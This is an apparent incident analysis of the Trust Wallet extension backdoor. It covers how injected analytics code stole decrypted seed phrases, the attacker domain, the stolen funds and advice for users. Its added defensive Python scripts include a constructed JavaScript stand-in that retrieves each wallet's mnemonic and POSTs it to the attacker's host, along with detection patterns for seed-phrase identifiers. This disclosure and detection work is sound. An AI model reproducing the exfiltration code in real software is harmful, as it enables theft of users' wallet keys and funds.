
Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hacking | Bee Network

Background

Tactics and Techniques

Upon receiving the intelligence, the SlowMist security team immediately began analyzing the relevant samples. Let’s first compare the core code of the previously released version 2.67 with that of version 2.68:

By diffing the two versions of the code, the following malicious code added by the hacker was discovered:

The malicious code iterates through every wallet in the extension and sends a “get mnemonic phrase” request to each one to obtain the user’s encrypted mnemonic phrase. It then decrypts the mnemonic phrase with the password or passkeyPassword the user entered when unlocking the wallet. If decryption succeeds, the plaintext mnemonic phrase is sent to the attacker’s domain `api.metrics-trustwallet[.]com`.
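The analysis above is essentially a diff review: line up two released versions and inspect what was added. The script below is an added example, not SlowMist’s or Trust Wallet’s code; it automates that first pass by diffing two source snippets and flagging added lines that reference seed-phrase retrieval or unlock credentials, or that point at a host outside an allowlist. Both source snippets are constructed stand-ins that only mimic the shape of the change, and the allowlisted analytics host is an assumption.

```python
"""Triage the diff between two versions of a browser extension's source.

Added example; not SlowMist's or Trust Wallet's code. Every line that is
new in the second version is checked for identifiers tied to seed-phrase
retrieval or unlock credentials, and for URLs whose host is not on an
allowlist. The source snippets are constructed stand-ins.
"""
import difflib
import re

# Constructed stand-in for the benign analytics module (old version).
OLD_SRC = """\
function reportEvent(name, props) {
  posthog.capture(name, props);
}
"""

# Constructed stand-in for the tampered module (new version): the added
# function asks each wallet for its seed phrase and posts it to a new host.
NEW_SRC = """\
function reportEvent(name, props) {
  posthog.capture(name, props);
}
async function collect(wallets, password) {
  for (const w of wallets) {
    const enc = await emit("GET_SEED_PHRASE", { id: w.id });
    const phrase = decrypt(enc, password);
    fetch("https://api.metrics-trustwallet.com/e", {
      method: "POST",
      body: JSON.stringify({ errorMessage: phrase }),
    });
  }
}
"""

# Assumption: the only host the analytics module is expected to contact.
ALLOWED_HOSTS = {"app.posthog.com"}

# Identifiers whose appearance in *added* code deserves a manual look.
SENSITIVE = re.compile(
    r"GET_SEED_PHRASE|GetSeedPhrase|passkeyPassword|mnemonic|privateKey", re.I
)
HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def added_lines(old_src, new_src):
    """Return the lines present in new_src but not in old_src."""
    diff = difflib.unified_diff(
        old_src.splitlines(), new_src.splitlines(), lineterm="", n=0
    )
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def triage(old_src, new_src, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail, line) findings for suspicious added lines."""
    findings = []
    for line in added_lines(old_src, new_src):
        for host in HOST.findall(line):
            if host.lower() not in allowed_hosts:
                findings.append(("new-host", host.lower(), line.strip()))
        hit = SENSITIVE.search(line)
        if hit:
            findings.append(("sensitive-api", hit.group(0), line.strip()))
    return findings


if __name__ == "__main__":
    for kind, detail, line in triage(OLD_SRC, NEW_SRC):
        print(f"[{kind}] {detail}: {line}")
```

Run against the two stand-ins, the script reports the `GET_SEED_PHRASE` call and the previously unseen host `api.metrics-trustwallet.com`, which are exactly the two facts a release reviewer needed to see. In practice the allowlist would be the hosts declared in the extension’s manifest and the identifier list would be drawn from the wallet’s own message names.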

We also examined the attacker’s domain, metrics-trustwallet.com.

According to the registration lookup, the malicious domain was registered on 2025-12-08 at 02:28:18, and the registrar is NICENIC INTERNATIONA.

The first request to api.metrics-trustwallet[.]com was recorded on December 21, 2025.

This timing almost exactly matches the date the backdoor was implanted in the code, 12.22.

We continued to reproduce the entire attack process through code tracing and analysis:

Dynamic analysis shows that, after the wallet is unlocked, the attacker’s code can be seen filling the error field with the mnemonic phrase, as shown in R1.

This error data is obtained through a GET_SEED_PHRASE function call. Trust Wallet currently supports two unlocking methods: password and passkeyPassword. When the wallet is unlocked, the malicious code captures the password or passkeyPassword, calls GET_SEED_PHRASE to obtain the wallet’s mnemonic phrase (the private key is handled the same way), and then places the mnemonic phrase in the “errorMessage” field.

The following is the code that uses emit to call GetSeedPhrase to retrieve mnemonic phrase data and populate it into error.

Traffic analysis with Burp Suite showed that, once obtained, the mnemonic phrase was wrapped in the errorMessage field of the request body and sent to the malicious server (https://api.metrics-trustwallet.com), consistent with the code analysis above.
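The traffic finding above gives a defender two concrete signals: an analytics request going to a host the extension should never contact, and a body field carrying something shaped like a seed phrase. The script below is an added example, not part of the original analysis, that turns both into a detection rule over captured requests. The request records are constructed, the expected analytics host is an assumption, and the seed-phrase check is a shape heuristic (BIP39 word counts and lowercase words) rather than a full wordlist match.

```python
"""Flag outbound analytics requests that carry a seed-phrase-like string.

Added example; not part of the original analysis. Each captured request is
checked for an unexpected destination host and for any JSON string value
(the errorMessage field included) that looks like a BIP39 mnemonic.
"""
import json
import re
from urllib.parse import urlparse

# Assumption: the only analytics host the extension is expected to reach.
EXPECTED_HOSTS = {"app.posthog.com"}

# BIP39 mnemonics are 12, 15, 18, 21 or 24 lowercase words of 3-8 letters.
# This is a shape heuristic, not a wordlist check.
MNEMONIC_LENGTHS = {12, 15, 18, 21, 24}
WORD = re.compile(r"^[a-z]{3,8}$")


def looks_like_mnemonic(text):
    """True if text has the word count and word shape of a seed phrase."""
    words = text.strip().split()
    return len(words) in MNEMONIC_LENGTHS and all(WORD.match(w) for w in words)


def walk_strings(obj):
    """Yield every string value in a nested JSON object, whatever the key."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from walk_strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from walk_strings(value)


def inspect_request(url, body, expected_hosts=EXPECTED_HOSTS):
    """Return the list of reasons this request should be alerted on."""
    host = urlparse(url).hostname or ""
    reasons = []
    if host not in expected_hosts:
        reasons.append(f"unexpected host {host}")
    try:
        payload = json.loads(body)
    except ValueError:
        return reasons  # non-JSON body: only the host check applies
    if any(looks_like_mnemonic(s) for s in walk_strings(payload)):
        reasons.append("seed-phrase-like string in body")
    return reasons


# Constructed sample traffic, not real captures. The phrase is the first
# twelve BIP39 words, used only as a stand-in.
SAMPLE_REQUESTS = [
    ("https://app.posthog.com/e/",
     json.dumps({"event": "wallet_unlocked",
                 "properties": {"version": "2.68"}})),
    ("https://api.metrics-trustwallet.com/e/",
     json.dumps({"event": "error",
                 "properties": {"errorMessage": "abandon ability able about "
                                "above absent absorb abstract absurd abuse "
                                "access accident"}})),
]


def scan(requests=SAMPLE_REQUESTS):
    """Return (url, reasons) for every request that triggers a reason."""
    alerts = []
    for url, body in requests:
        reasons = inspect_request(url, body)
        if reasons:
            alerts.append((url, reasons))
    return alerts


if __name__ == "__main__":
    for url, reasons in scan():
        print(url, "->", "; ".join(reasons))
```

Only the second sample request is alerted on, and for both reasons at once. The string walk deliberately ignores field names: hiding the phrase in a field called errorMessage is precisely what defeats any rule keyed on “mnemonic” or “seed” as a key.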

The above process completes the theft of the mnemonic phrase/private key. The attackers also appear to be familiar with the extension’s source code, since they reuse the open-source product analytics platform PostHog JS, already present in the extension, to collect user wallet information.

Analysis of stolen assets

According to the hacker addresses disclosed by ZachXBT (https://t.me/investigations/296), our statistics show that, as of the time of writing, approximately 33 BTC (worth about 3 million USD) was stolen on the Bitcoin blockchain, approximately 431 USD on the Solana blockchain, and approximately 3 million USD across various blockchains including the Ethereum mainnet and Layer 2 networks. After the theft, the hackers transferred and exchanged some of the assets through various centralized exchanges and cross-chain bridges.

Summary

This backdoor incident stemmed from a malicious modification of Trust Wallet’s own source code (the analytics service logic), not from the introduction of a tampered generic third-party package (such as a malicious npm package). The attackers directly modified the application’s own code, using the legitimate PostHog library to redirect analytics data to a malicious server. We therefore have reason to believe this was a professional APT attack, and that the attackers had gained control of Trust Wallet developers’ devices or deployment permissions before December 8th.

Recommendations:

1. If you have installed the Trust Wallet extension wallet, you should disconnect from the internet immediately as a prerequisite for troubleshooting and taking any action.

2. Immediately export your private key/mnemonic phrase and uninstall the Trust Wallet extension wallet.

3. After backing up your private key/mnemonic phrase, transfer your funds to another wallet as soon as possible.
